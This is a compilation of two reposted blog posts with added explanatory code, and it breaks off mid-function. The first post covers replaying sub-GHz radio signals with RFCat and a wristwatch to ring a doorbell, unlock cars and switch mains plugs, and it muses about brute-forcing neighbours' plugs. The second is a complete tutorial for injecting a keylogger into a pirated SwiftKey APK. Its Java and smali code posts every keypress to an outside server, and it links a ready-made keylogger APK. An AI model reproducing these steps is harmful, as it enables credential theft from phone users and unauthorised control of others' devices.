So we can hear it, and it sounds like data, but we still can't do anything useful with it. Saving it to a wavefile is just as easy: and now this is where the fun begins. We can edit that file with any audio editor. I used Audacity but pretty much anything will do. We can clearly see our data bursts, and if we zoom in: we can see some proper structure to it. This not only sounds like data but it looks like it too. What we appear to have is long pulses and short pulses, so we can imagine they may represent 0s and 1s just as they are - maybe a short pulse is a 0 and a long a 1...

Now I know I said I wasn't interested in understanding radio, but there is one little thing that will help to convert our data from its current analogue form into proper digital, and that's modulation.

There are many modulation schemes out there, but the two you're most likely to encounter at this level are FM (Frequency Modulation) and AM (Amplitude Modulation). FM is normally used for things that need reasonably high fidelity, like speech or music, but AM, although it can also be used for speech and music, is perfectly suited to binary data as all it needs to be is either 'ON' or 'OFF'. This is also known as OOK, or On-Off Keying, and as we can see from our sample, this is clearly what we are dealing with here. We have a flat line when we're 'OFF', which then becomes wavy when we're 'ON'.

Now we know we're dealing with AM, we can get GNU Radio to do one more job for us: demodulate the AM signal. And our signal now looks like this: Now, instead of bursts of wavy stuff, it's pretty much a straight line that goes high or low which is very clearly binary data. We have long pulses and short pulses, and the whole sample is simply this short pattern repeating. If we assume the short pulse represents a 0 and the long a 1, this decodes as:

0100000011110

Add some leading zeros to bring it up to a multiple of eight bits and we get 00001000 00011110, which is 08 1E in hex. Of course it may actually be interpreted differently - the 0 and 1 may be the other way around, and the bit order may be reversed, but for our purposes, at this stage, it really doesn't matter as long as it makes some kind of sense.

Great, so now what? I know my doorbell push-button is spitting out '081E', so therefore the bell itself must be listening for '081E' and ringing when it hears it. My neighbour's bell-push won't set it off as it's presumably sending out a different number. But how to test this? Ideally, I'd like to transmit my own signal, from something other than the bell-push, and if the bell rings I know I've got it right. Unfortunately, as cool as it is, the Fun Cube is just a receiver, so we need something that can transmit as well...
The easy option would be to go back to the USRP, but I've already discounted that as it won't fit in my laptop bag and I'd like to be able to do this on the move...

As I mentioned, the original device we were looking at was also using WiFi and Zigbee, so we were using an Ubertooth 2.4GHz dongle to poke around with that. I knew there were chips in the same device range that did sub-GHz frequencies, so I asked Mike Ossmann, the Ubertooth's designer, if he knew of any projects utilising these. I was in luck: he did. Not only had he got some research of his own, but he pointed me at RFCat, a new project (at the time) designed to do exactly this kind of thing. Perfect! Not only would I be able to receive the signals from the bell-push, but I should be able to emulate them as well.

RFCat is based around a Texas Instruments SoC (System on Chip) called the CC1111. These are really very cool devices, which provide microprocessor and built-in RF transceiver all in one package. This one even has an AES capable crypto co-processor and built-in USB, so it is the ideal platform for this kind of tomfoolery... Development kits in 433, 868 and 915 MHz bands are available off the shelf, and come in two forms: either as a standalone USB dongle (868/915 only): or these nifty wristwatches:

RFCat is a replacement firmware package for the USB dongle part of the kit, and allows low level access to the radio functions via a simple USB command interface. Oh, and it's in python. Joy!

So one impatient wait for an overnight delivery later I'm in business and I've got my RFCat dongle up and running. It has a nice object oriented interface, so all you need to do is create an instance and start doing stuff with it (my commands are in bold)...

$ rfcat -r
'RfCat, the greatest thing since Frequency Hopping!'

Research Mode: enjoy the raw power of rflib

currently your environment has an object called "d" for dongle. this is how you interact with the rfcat dongle:
    >>> d.ping()
    >>> d.setFreq(433000000)
    >>> d.setMdmModulation(MOD_ASK_OOK)
    >>> d.makePktFLEN(250)
    >>> d.RFxmit("HALLO")
    >>> d.RFrecv()
    >>> print d.reprRadioConfig()

Python 2.7.2+ (default, Jul 20 2012, 22:15:08)
Type "copyright", "credits" or "license" for more information.

IPython 0.10.2 -- An enhanced Interactive Python.
?         -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help      -> Python's own help system.
object?   -> Details about 'object'. ?object also works, ?? prints more.

In [1]: d.ping()
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002653 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002528 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004721 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004821 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.004573 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002605 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002430 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002678 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002519 seconds)
PING: 26 bytes transmitted, received: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' (0.002820 seconds)
Out[1]: (10, 0, 0.0331571102142334)

In [2]: d.setFreq(433920000)

In [3]: d.RFxmit('\x08\x1E')

In [4]:

At this point, not surprisingly, my doorbell didn't ring. This is because our interpretation of the data, giving us HEX 081E, is a little bit simplistic. The RFCat dongle doesn't understand that we want to represent a 0 as a short pulse and a 1 as a long, so we have to do a bit more work to get it into a format that RFCat can deal with...
A traditional microprocessor controlled radio circuit would typically have a separate circuit or daughterboard for the radio portion, and the microprocessor would signal the data it wanted to send by toggling a pin HIGH/LOW. The microprocessor would be entirely responsible for making sure that the timing was correct - i.e. that it held the pin HIGH for as long as it wanted the RF to be 'ON', and LOW for the duration of the 'OFF' period. However, in these SoC devices, the radio part is all done for you and you simply need to tell it what modulation scheme you want, speed of transmission etc., feed it some data and it will do the rest.

As we already know the modulation scheme (AM/OOK), that bit's easy, so now we just have to think of our original signal in terms of OOK, and what our data would need to look like to produce the same signal. Looking at the original trace, it's pretty 'readable', but if we want to really tidy it up we can turn it into a square wave and this will make visual checking of bit lengths much easier and more accurate. Since a .wav file is just a header with a bunch of values for each sample, it's really easy to manipulate. In this case we want to take any value that is below 0 and set it to absolute minimum, and anything above 0 we set to maximum, which is effectively what the original source was doing before the signal got converted and sent over RF - a 0 was a pin going LOW and a 1 was a pin going HIGH...

Accordingly, I wrote a little command line tool for tweaking wav files:

$ wav-cli.py /tmp/test1.wav square 0 out /tmp/ts.wav
Converting to square wave
Writing /tmp/ts.wav

and this is the result:

Now we can accurately convert the signal into true OOK binary. We take the smallest element as our single binary digit, and then represent the data with a 1 when we want the line to go high, and 0 when we want it to go low, taking into account the size of our pulse compared to the single binary digit. In this case we only have two different size pulses - short and long, so we can represent them with a single or double digit:

Again, we need to add some leading or trailing 0s to give ourselves an 8-bit multiple, so the final number we end up with is 00101100 10010010 01001001 01101101 10110010, or 2C 92 49 6D B2 in HEX. Since it's always the same, we don't really need to understand what this message 'means', only to be able to reproduce it. So in theory, if I set up RFCat to work in OOK mode with the correct speed and modulation, I should be able to transmit 2C92496DB2 and my doorbell should ring (the speed I get by measuring a short pulse width in seconds)...

In [1]: d.setFreq(433920000)
In [2]: d.setMdmDRate(int(1.0/0.000302))
In [3]: d.setMdmModulation(MOD_ASK_OOK)
In [4]: d.RFxmit('\x2C\x92\x49\x6D\xB2')

Hmm.... Nothing. However, my bell-push didn't just transmit the message once, it sent it dozens of times, so maybe I need to do the same:

In [5]: d.RFxmit('\x2C\x92\x49\x6D\xB2' * 60)

Nope, still nothing. Going back to my original trace I could see there was a gap between each data pulse, which we can easily simulate by adding some extra '0' bits, so:

In [6]: d.RFxmit('\x2C\x92\x49\x6D\xB2\x00\x00\x00' * 60)

Bingo! The doorbell rings and my dogs go crazy telling me there's someone at the door! Nice!!!

Well, this is very cool and all, but it's not very, erm... Bond, is it? I mean, Daniel Craig isn't going to get the girl, save the world and keep Dame Judi happy by saying... "Hang on Bad Guys, I've just got to get my laptop out... plug in this USB dongle... nearly got it... just a tick... Ouch, that hurt!" No. Not really. What we need is something much cooler, sexier, and, well.... shiny! Something Gucci that's always right there, ready to go at a moment's notice... . But wait! What's that in the box of bits that came with my dev kit? A wristwatch? With a frikkin' transmitter built into it???? OK.... now that's what I'm talkin' 'bout! Come to Papa...
And so, I give you the latest thing from my local toy store... It's called "radio":

[h=2]Chronos Integrated Commander[/h]

Or ChronIC for short... It's basically a cut-down RFCat-like firmware package that allows you to use the watch to transmit arbitrary signals. You can set it up either from the watch itself, or via the original Chronos dongle with a python helper, and then the up/down buttons on the right of the watch do the transmitting. The python helper looks like this:

$ chronic-cli.py
Usage: /usr/local/bin/chronic-cli.py <COMMAND> [ARG(s)] ... [<COMMAND> [ARG(s)] ... ]

Commands:

    BAUD <RATE>               Set RF modem baudrate
    BYRON                     Configure for Byron doorbell emulation
    DELAY <0-255>             Delay in MS between each DATA transmission
    DOWN <HEX> <HEX> <HEX>    Set DATA for DOWN button - 3 * 63 bytes
    EXIT                      Force sync mode EXIT on Chronos
    FREQ <FREQUENCY>          Set Frequency (e.g. 433920000)
    FRIEDLAND                 Configure for Friedland doorbell emulation
    MAN <'ON'|'OFF'>          Set Manchester Encoding
    MOD <FSK|GFSK|OOK|MSK>    Modulation:
                                FSK - Frequency Shift Keying
                                GFSK - Gaussian Frequency Shift Keying
                                OOK - On-Off Keying (in ASK mode)
                                MSK - Multiple Frequency Shift Keying
    REPEAT <0-255>            Number of times to repeat DATA when button pressed
    RUKU                      Configure for Ruku garage door emulation
    SERIAL <BAUD>             Set access point comms baudrate (default 115200)
    PULSE <WIDTH>             Set pulsewidth (baud rate = 1.0/pulsewidth)
    TIME                      Synchronise time/date
    UP <HEX> <HEX> <HEX>      Set DATA for UP button - 3 * 63 bytes

Commands will be executed sequentially and must be combined as appropriate. It is recommended to finish with an EXIT to help conserve battery.

Full instructions are in the README in the github repo, but here is an example of setting it up to ring my doorbell. Put the watch in 'SYNC' mode, and then:

$ chronic-cli.py freq 433920000 man off delay 0 repeat 60 pulse 0.000320 up 2C92496DB2000000 '' '' down 2C92496DB2000000 '' '' exit
Setting Frequency: 433920000 (OK)
Setting Manchester Encoding: OFF (OK)
Setting delay: 0 (OK)
Setting repeat: 60 (OK)
Setting pulsewidth: 0.00032 (3124.237061 Hz) (OK)
Setting UP Button: (OK)
Setting DOWN Button: (OK)
Sending EXIT command

Or you can take the shortcut:

$ chronic-cli.py byron
Setting up for Byron Doorbell
Setting Frequency: 433920000
Setting Manchester Encoding: OFF
Setting Delay: 0
Setting Repeat: 60
Setting PulseWidth: 0.000320 (3124.237061 Hz)
Setting UP button: 2C92496DB2000000
Setting DOWN button: 2C92496DB2000000

And there are plenty of other targets... Discussions on the gnuradio mailing list back in 2006 show that the obvious one of a car key was being looked at. Matt Ettus says:

"After the Wired article today, I've received a couple of email from people who are concerned that the USRP could be used to clone their keyfob transmitters for car alarms and garage doors. I'm not concerned, since there are already many ways to do this (just check the back of popular science magazine). However, I am curious about it. I know that we can capture and play back any rf signal. The question is whether that replayed signal would result in the door being unlocked. I was under the impression that most of those systems allow an unlock code to only be used once, but does anyone out there know for sure?"

Well, here's your answer:

Unlocking and re-locking my son's Beemer:

And the wife's Disco (note the pause and the second set of 'clunks' - this is because the first command only opens the driver's door, but because we have the option to send multiple sequences we can send another open command which then opens the rest of the doors):

Of course, opening car doors is a nice party trick, but because modern vehicles are secured by rolling codes, that's all it is - a party trick.
You'll be able to do this once and once only with each 'hacked' sequence...

What's of more concern to me are devices like the 'Owl Plug':

These handy little devices allow you to control mains voltage appliances via RF. Clearly, this could have serious consequences if care is not taken when switching things on and off. What if it's an electric heater and it got shoved into a corner to vacuum the room? It gets switched back on and bingo, the curtains are on fire! Let's hope they've made the protocol nice and secure then!

Oh, dear. No rolling code. Same bit sequence every time:

And the only difference between the five buttons on the remote is a few bits. I suspect, therefore, that the only difference between my remote and my neighbour’s will also only be a few bits, so it's probably not much of an exercise to figure out which ones I need to brute force to be able to go around switching things on and off at random (I've ordered another one and will check, so watch this space...).

As usual, the code is available on the Aperture Labs tools page, but please bear in mind that while playing with your own RF devices is perfectly OK in any reasonable society, playing with other people's (without their permission) is most definitely not (and probably illegal)! Behave!

Posted by Adam "Major Malfunction" Laurie at 03:55

Source: Obviously a Major Malfunction...: You can ring my bell! Adventures in sub-GHz RF land...
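The pulse-width decoding the post walks through by eye (short pulse = 0, long pulse = 1, then pad to whole bytes), done in code. This is an added Python example and is not part of the original post, nor of RFCat or ChronIC. Its input is a square wave constructed from the post's own 2C 92 49 6D B2 pattern; the sample rate (48 kHz) and the number of samples per unit pulse (15) are assumed values, not measurements from the post. It also returns the data rate the post feeds to setMdmDRate(), derived from the shortest pulse.

```python
"""Pulse-width decoding of an on-off keyed (OOK) square-wave capture.

Added example, not from the original post. The sample array is constructed
from the post's 40-bit pattern so the decoder can run offline.
"""

OOK_HEX = "2C92496DB2"     # the post's final OOK bit pattern, one bit per unit of air time
SAMPLE_RATE = 48_000       # Hz, assumed capture rate (constructed)
SAMPLES_PER_UNIT = 15      # ~312 us per unit at 48 kHz, assumed (constructed)


def hex_to_bits(hex_str):
    """'2C' -> '00101100' (most significant bit first)."""
    return "".join(f"{int(h, 16):04b}" for h in hex_str)


def synth_square_wave(bits, samples_per_unit=SAMPLES_PER_UNIT, amp=32767):
    """Constructed input: expand each OOK bit into a run of +amp or -amp
    samples, i.e. what the post's wav-cli 'square' step produces from a
    demodulated recording."""
    out = []
    for b in bits:
        out.extend([amp if b == "1" else -amp] * samples_per_unit)
    return out


def run_lengths(samples, threshold=0):
    """Collapse samples into (level, length) runs; level 1 means 'ON'."""
    runs = []
    for s in samples:
        level = 1 if s > threshold else 0
        if runs and runs[-1][0] == level:
            runs[-1][1] += 1
        else:
            runs.append([level, 1])
    return [(lvl, n) for lvl, n in runs]


def decode_pulses(samples, sample_rate=SAMPLE_RATE):
    """Classify each ON pulse as short (0) or long (1) by its width.

    Returns (bitstring, unit_seconds, data_rate_hz). The cut-off sits halfway
    between the shortest and longest pulse seen, which suits the two-width
    signal the post describes; a capture with three widths would need a
    different scheme. The gaps (OFF runs) are ignored, as in the post."""
    pulses = [n for lvl, n in run_lengths(samples) if lvl == 1]
    if not pulses:
        return "", 0.0, 0.0
    shortest, longest = min(pulses), max(pulses)
    cut = (shortest + longest) / 2.0
    bits = "".join("0" if n <= cut else "1" for n in pulses)
    unit = shortest / float(sample_rate)   # seconds per short pulse
    return bits, unit, 1.0 / unit          # 1/unit is what setMdmDRate() wants


def bits_to_padded_hex(bits):
    """Left-pad to a multiple of 8 bits and render as hex, as the post does."""
    padded = bits.rjust(-(-len(bits) // 8) * 8, "0")
    return "".join(f"{int(padded[i:i + 8], 2):02X}" for i in range(0, len(padded), 8))


if __name__ == "__main__":
    wave = synth_square_wave(hex_to_bits(OOK_HEX))
    bits, unit, rate = decode_pulses(wave)
    print(bits, bits_to_padded_hex(bits), f"{unit * 1e6:.1f} us/unit", f"{rate:.0f} baud")
```

Run against the constructed wave this recovers the post's 0100000011110 and 081E; on a real capture the threshold and the amplitude threshold in run_lengths are the two values that need tuning, since demodulated audio is rarely a clean square wave until it has been through the squaring step the post describes.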
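Why the captured frame keeps working against the doorbell and the Owl Plug but, as the post says, works "once and once only" against a car with rolling codes: an added Python model contrasting the two receiver designs. This is not code from the post and not any real keyfob or doorbell protocol; it is a constructed toy in which a rolling code is a short HMAC tag over a press counter under a key shared by fob and receiver, and the receiver accepts only counters in a forward window past the last one it saw. The key, window size and 4-byte frame format are assumptions made for the example.

```python
"""Fixed code vs. rolling code: replay resistance in a toy receiver model.

Added example, not from the original post and not a real product's protocol.
Constructed: codes are 4-byte HMAC-SHA256 tags over a press counter.
"""
import hashlib
import hmac

WINDOW = 16   # presses the receiver tolerates missing (assumed value)
SHARED_KEY = b"constructed-demo-key-not-a-real-product-key"


class FixedCodeReceiver:
    """Doorbell / Owl Plug style: the same frame is valid every time."""

    def __init__(self, code):
        self.code = code

    def accept(self, frame):
        return hmac.compare_digest(frame, self.code)


def rolling_tag(key, counter):
    """Code transmitted for press number `counter`."""
    return hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:4]


class RollingCodeFob:
    def __init__(self, key):
        self.key = key
        self.counter = 0

    def press(self):
        self.counter += 1
        return rolling_tag(self.key, self.counter)


class RollingCodeReceiver:
    """Accepts a tag only for a counter strictly ahead of the last accepted
    one and within WINDOW; a replayed tag maps to an old counter and is
    rejected. Losing more than WINDOW presses desynchronises fob and
    receiver, which is why real systems carry a resync procedure."""

    def __init__(self, key):
        self.key = key
        self.last = 0

    def accept(self, frame):
        for c in range(self.last + 1, self.last + 1 + WINDOW):
            if hmac.compare_digest(rolling_tag(self.key, c), frame):
                self.last = c
                return True
        return False


def replay_trial():
    """Run the post's scenario against both receiver types.

    Returns booleans: was the original press accepted, was an exact replay of
    that frame accepted, does a fresh press after the replay still work, and
    what happens when the fob has moved more than WINDOW presses ahead."""
    results = {}

    bell = FixedCodeReceiver(bytes.fromhex("2C92496DB2"))   # the post's doorbell frame
    captured = bytes.fromhex("2C92496DB2")
    results["fixed_first"] = bell.accept(captured)
    results["fixed_replay"] = bell.accept(captured)

    fob, car = RollingCodeFob(SHARED_KEY), RollingCodeReceiver(SHARED_KEY)
    captured = fob.press()                 # the frame an eavesdropper records
    results["rolling_first"] = car.accept(captured)
    results["rolling_replay"] = car.accept(captured)
    results["rolling_fresh"] = car.accept(fob.press())

    frame = None
    for _ in range(WINDOW + 1):            # fob pressed out of range of the receiver
        frame = fob.press()
    results["rolling_out_of_window"] = car.accept(frame)
    return results


if __name__ == "__main__":
    for name, ok in replay_trial().items():
        print(f"{name:24s} {'accepted' if ok else 'rejected'}")
```

The model deliberately leaves out what real systems add on top (an encrypted counter in the frame, per-device serial numbers, resynchronisation), but it is enough to show the property the post observes: the receiver's state advances on every accepted frame, so a recording is worthless the moment the legitimate fob has been used again.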
  12. [h=1]Inserting keylogger code in Android SwiftKey using apktool[/h]

Piracy on Android is a very big problem but I wonder do users realise how easy it is to inadvertently download apps with malware. Cracked copies of PC and iPhone apps can have malware as well of course but on both those platforms most software is compiled to machine code. Android apps are coded in Java and compiled to byte code that is run on the Dalvik VM and this byte code is not that hard to edit and insert back into an APK. SwiftKey Keyboard is the top paid app in the Play store at the moment and it’s a great app, best €4 I spent but I knew it’d be heavily pirated at that price. Now your standard malware-ridden Android app or game might have some code that sends you annoying notification ads but anyone who sideloads a dodgy copy of an Android keyboard is taking a serious risk of a keylogger being inserted and people tracking all their passwords, Google searches and Credit Card numbers.

In this post, I’ll show you how to do exactly that with apktool and Swiftkey from start to finish, all you need is a basic knowledge of Java and Android. The end result is this Keylogger SwiftKey APK that sends all keylogs to my server. Try it out for yourself, download and install the modified APK, start using it and visit my logger page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php, select your IP and see your keylogs being sent. Scary huh? Goes without saying, be sure to uninstall the app when you see how it works! Continue reading below to see how to do it.

[h=2]SwiftKey APK[/h]

First you’ve got to understand the Android file format that SwiftKey and all other Android apps are in. The Android package, or APK, is the container for an Android app’s resources and executables. It’s a zipped file that for SwiftKey contains simply:

AndroidManifest.xml (serialized, but apktool decodes to source)
classes.dex
lib/
assets/
res/
META-INF/

The actual bytecode of the application is the classes.dex file, or the Dalvik executable that runs on the device. The application’s resources (i.e. images, sound files) reside in the res directory, and the AndroidManifest.xml is more or less the link between the two, providing some additional information about the application to the OS. The lib directory contains native libraries that Swiftkey uses via NDK, and the META-INF directory contains information regarding the application’s signature.

[h=2]The Tools[/h]

There are a few different tools out there to decompile, compile and resign APKs. All the decompilers are based on or use smali to decompile/compile the classes.dex file. apktool wraps up a few of these tools in one but you still have to re-sign and then install on a device. So then there’s APK multitool which wraps apktool, keytool and other things to let you press one button and have your edited code compiled, zipped, signed and installed to your device via adb all in one go. So download that and set it up but remember it’s just a collection of other tools.

[h=2]Disassembling SwiftKey[/h]

Once you’ve installed APK multitool, you’d normally place your APK in the ‘place-apk-here-for-modding’ folder, open up Script.bat and enter 9 to decompile source and resources. Unfortunately SwiftKey throws errors when you try and recompile resources as it has capitalised resource filenames and was probably compiled with a modified aapt. We call these magick APKs and apktool can’t recompile edited resources but we can still compile edited smali code, which is all we want to make our keylogger anyway. So enter 27 to change the decompile mode to ‘Source Files only’, then enter 9 to decompile. If nothing goes wrong, there’ll be a folder created inside projects called ‘com.touchtype.swiftkey-1.apk’ containing:

AndroidManifest.xml (still serialized, remember we didn’t decompile resources)
res/ (same as in APK)
smali/
apktool.yml

The smali directory is probably the most important of the three, as it contains a set of smali files, or bytecode representation of the application’s dex file. You can think of it as an intermediate file between the .java and the executable. Inside the directory we have ‘com’, ‘oauth’ and ‘org’. We’re looking for code that we can place our keylogger so we can ignore oauth as that’s obviously a library for oauth access. org contains some Apache Commons library so that can be ignored as well. Inside com, android and google directories are to be ignored as well, it’s the touchtype and touchtype_fluency directories that we’re interested in. I’ve done the hard work already and found what we’re looking for in the ‘touchtype\keyboard\inputeventmodel\events’ directory. Go there and open up KeyInputEvent.smali in a text editor. We’re very lucky that SwiftKey isn’t ProGuard protected which obfuscates code and really slows down reverse engineering but never makes it impossible.
[h=2]Reading the Smali[/h]

So let’s examine some of the KeyInputEvent smali code:

.class public abstract Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent;
.super Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;
.source "KeyInputEvent.java"

# direct methods
.method public constructor <init>(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V
    .locals 0
    .parameter "extractedText"
    .parameter "inputText"

    .prologue
    .line 8
    invoke-direct {p0, p1, p2}, Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;-><init>(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V

    .line 9
    return-void
.end method

This class seems to be called whenever the user makes a single keypress in SwiftKey but not when using flow. The constructor is what we’re looking at and is called with 2 parameters, an instance of a ‘com/touchtype_fluency/service/TouchTypeExtractedText’ class and a CharSequence which is the key pressed. We want to send this key to our servers so we need to insert the code here. If you’re a smali expert you can code it directly and compile but we’re not so we’ll code some in Java first, decompile and copy the smali over. We also want to send it in an AsyncTask as the keyboard is way too slow without it. This is my Java code which we’ll call MainActivity.java, part of a package called ‘com.androidapps.tutorial’:

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    CharSequence cs = "Hi how are u";
    HashMap<String, String> data = new HashMap<String, String>();
    data.put("data", cs.toString());
    AsyncHttpPost asyncHttpPost = new AsyncHttpPost(data);
    asyncHttpPost.execute("http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php");
}

public class AsyncHttpPost extends AsyncTask<String, String, String> {
    private HashMap<String, String> mData = null; // post data

    /**
     * constructor
     */
    public AsyncHttpPost(HashMap<String, String> data) {
        mData = data;
    }

    /**
     * background
     */
    @Override
    protected String doInBackground(String... params) {
        byte[] result = null;
        String str = "";
        HttpClient client = new DefaultHttpClient();
        HttpPost post = new HttpPost(params[0]); // in this case, params[0] is URL
        try {
            // set up post data
            ArrayList<NameValuePair> nameValuePair = new ArrayList<NameValuePair>();
            Iterator<String> it = mData.keySet().iterator();
            while (it.hasNext()) {
                String key = it.next();
                nameValuePair.add(new BasicNameValuePair(key, mData.get(key)));
            }
            post.setEntity(new UrlEncodedFormEntity(nameValuePair, "UTF-8"));
            HttpResponse response = client.execute(post);
            StatusLine statusLine = response.getStatusLine();
            if (statusLine.getStatusCode() == HttpURLConnection.HTTP_OK) {
                result = EntityUtils.toByteArray(response.getEntity());
                str = new String(result, "UTF-8");
            }
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        } catch (Exception e) {
        }
        return str;
    }

    /**
     * on getting result
     */
    @Override
    protected void onPostExecute(String result) {
        // something...
    }
}

When we export this from Eclipse as an APK, decompile and look at the directory we find 2 files, MainActivity.smali and MainActivity$AsyncHttpPost.smali. The ‘$’ in the filename means it’s the AsyncHttpPost inner class. Let’s look at the onCreate of MainActivity:

MainActivity.smali

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 6
    .parameter "savedInstanceState"

    .prologue
    .line 146
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    .line 149
    const-string v1, "Hi how are u"

    .line 150
    .local v1, cs:Ljava/lang/CharSequence;
    new-instance v2, Ljava/util/HashMap;

    invoke-direct {v2}, Ljava/util/HashMap;-><init>()V

    .line 151
    .local v2, data:Ljava/util/HashMap;,"Ljava/util/HashMap<Ljava/lang/String;Ljava/lang/String;>;"
    const-string v3, "data"

    invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;

    move-result-object v4

    invoke-virtual {v2, v3, v4}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;

    .line 152
    new-instance v0, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;

    invoke-direct {v0, p0, v2}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;-><init>(Lcom/androidapps/tutorial/MainActivity;Ljava/util/HashMap;)V

    .line 153
    .local v0, asyncHttpPost:Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;
    const/4 v3, 0x1

    new-array v3, v3, [Ljava/lang/String;

    const/4 v4, 0x0

    const-string v5, "http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php"

    aput-object v5, v3, v4

    invoke-virtual {v0, v3}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;

    .line 158
    return-void
.end method

So we better explain some of this code. The first line is the smali method definition of onCreate with the Bundle parameter passed in and the return type at the end, which is V for void. Java primitives are denoted by a single letter and can be missed sometimes so keep an eye out for them.

V  void
Z  boolean
B  byte
S  short
C  char
I  int
J  long (64 bits)
F  float
D  double (64 bits)

Next line is very important for us, it declares how many local registers are to be used in this method without including registers allocated to the parameters of the method.
The number of parameters for any given method will always be the number of input parameters + 1. This is due to an implicit reference to the current object that resides in parameter register 0 or p0 (in java this is called the “this” reference). The registers are essentially references, and can point to both primitive data types and java objects. Given 6 local registers, 1 parameter register, and 1 “this” reference, the onCreate() method uses an effective 8 registers.

For convenience, smali uses a ‘v’ and ‘p’ naming convention for local vs. parameter registers. Essentially, parameter (p) registers can be represented by local (v) registers and will always reside in the highest available registers. For this example, onCreate() has 6 local registers and 2 parameter registers, so the naming scheme will look something like this:

v0 - local 0
v1 - local 1
v2 - local 2
v3 - local 3
v4 - local 4
v5 - local 5
v6/p0 - local 6 or parameter 0 (this)
v7/p1 - local 7 or parameter 1 (android/os/Bundle)

[h=2]Opcodes[/h]

Dalvik opcodes are relatively straightforward, but there are a lot of them. For the sake of this post’s length, we’ll only go over a few of the most commonly used opcodes.

invoke-super vx, vy, … invokes the parent classes method in object vx, passing in parameter(s) vy, …
new-instance vx creates a new object instance and places its reference in vx
invoke-direct vx, vy, … invokes a method in object vx with parameters vy, … without the virtual method resolution
const-string vx creates string constant and passes reference into vx
invoke-virtual vx, vy, … invokes the virtual method in object vx, passing in parameters vy, …
return-void returns void

[h=2]Hacking the App[/h]

Now that I’ve explained a bit of what the code means, let’s inject it into the KeyInput file of SwiftKey. Note in our exported Smali from MainActivity that it references the ‘com/androidapps/tutorial’ package so we need to change that to the package where KeyInput is which is ‘com/touchtype/keyboard/inputeventmodel/events/’. So open up both MainActivity.smali and MainActivity$AsyncHttpPost and do a search and replace changing ‘com/androidapps/tutorial/MainActivity’ to ‘com/touchtype/keyboard/inputeventmodel/events/KeyInputEvent’.

Next we’ve to ensure we have the right amount of registers in the SwiftKey KeyInputEvent to support our new method calls. We can see that the original constructor uses no local variables and our MainActivity uses 6 so just set locals 0 to locals 6. Then copy our new code in, just before the return void of the constructor. In our injected code, the v1 local variable holds the CharSequence ‘Hi how are u’ which is converted to a String in the ‘invoke-interface {v1}, Ljava/lang/CharSequence;->toString’ line. We need to make the code use the CharSequence key the user pressed which is the second parameter so change v1 to p2. Next copy over our AsyncTask inner class into the same folder as KeyInputEvent.smali and rename it to KeyInputEvent$AsyncHttpPost. Make similar changes to the TextInputEvent.smali file in the same directory if you want to track SwiftKey flows as well.

[h=2]Rebuilding, Signing and Installing the Apk[/h]

Before it was a bit of work to do these three steps but with APK multitool all you need to do is enter 15 in your project with your phone connected and the app should install. If you encountered any errors, post a comment below and I’ll help you out. I might have left a few things out of this tutorial for brevity’s sake. If it all worked and you didn’t change the POST URL, just start using the keyboard and check my page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php to see what keys are being sent from different IPs! Scary huh?

Moral of the story if you want to avoid keyloggers or other malware from your Android? Stick to the Play store and don’t pirate apps!

Source: Inserting keylogger code in Android SwiftKey using apktool | Android App Development Ireland
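Two things a reader who wants to check a sideloaded keyboard APK, rather than modify one, needs from the post's smali walkthrough: how Dalvik method descriptors and the .locals/p-register layout actually work (the post's "inputs + 1" rule holds for instance methods only, since static methods have no p0 "this", and the 64-bit J and D types each occupy two registers), and a first-pass scan of decompiled smali for input-event classes that reach network APIs, which is exactly the footprint the post's injected AsyncHttpPost leaves. Added Python example, not from the post and not part of apktool or smali; the smali fragment it scans is constructed to resemble the post's renamed inner class and is not SwiftKey's code.

```python
"""Smali triage helpers: descriptor parsing, register layout, network-sink scan.

Added example, not from the original post. SAMPLE_SMALI is a constructed
fragment modelled on the post's description, not real SwiftKey code.
"""

WIDE = {"J", "D"}   # long and double take two adjacent registers


def parse_descriptor(desc):
    """'(Landroid/os/Bundle;I)V' -> (['Landroid/os/Bundle;', 'I'], 'V').

    Objects run from 'L' to the next ';', arrays prefix '[' per dimension,
    primitives are one letter (the table the post lists)."""
    params_str, ret = desc[1:].split(")", 1)
    params, i = [], 0
    while i < len(params_str):
        start = i
        while params_str[i] == "[":
            i += 1
        if params_str[i] == "L":
            i = params_str.index(";", i) + 1
        else:
            i += 1
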